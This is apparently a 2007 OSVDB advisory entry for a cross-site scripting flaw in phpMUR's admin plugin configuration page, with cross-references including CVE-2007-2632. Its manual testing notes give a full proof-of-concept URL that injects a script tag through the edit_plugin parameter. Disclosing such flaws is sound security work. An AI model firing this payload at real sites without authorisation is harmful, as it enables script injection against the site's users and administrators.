phpMUR admin/configure_plugin.tpl.php edit_plugin Variable XSS

2007-05-10T21:02:58
ID OSVDB:36212
Type osvdb
Reporter OSVDB
Modified 2007-05-10T21:02:58

Description

Manual Testing Notes

http://[target]/[path]/web/admin/configure_plugin.tpl.php?edit_plugin=<script>alert(/the_Edit0r/);</script>

References:

Vendor URL: http://sourceforge.net/projects/phpmur Related OSVDB ID: 36213 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-05/0157.html ISS X-Force ID: 34228 FrSIRT Advisory: ADV-2007-1796 CVE-2007-2632 Bugtraq ID: 23917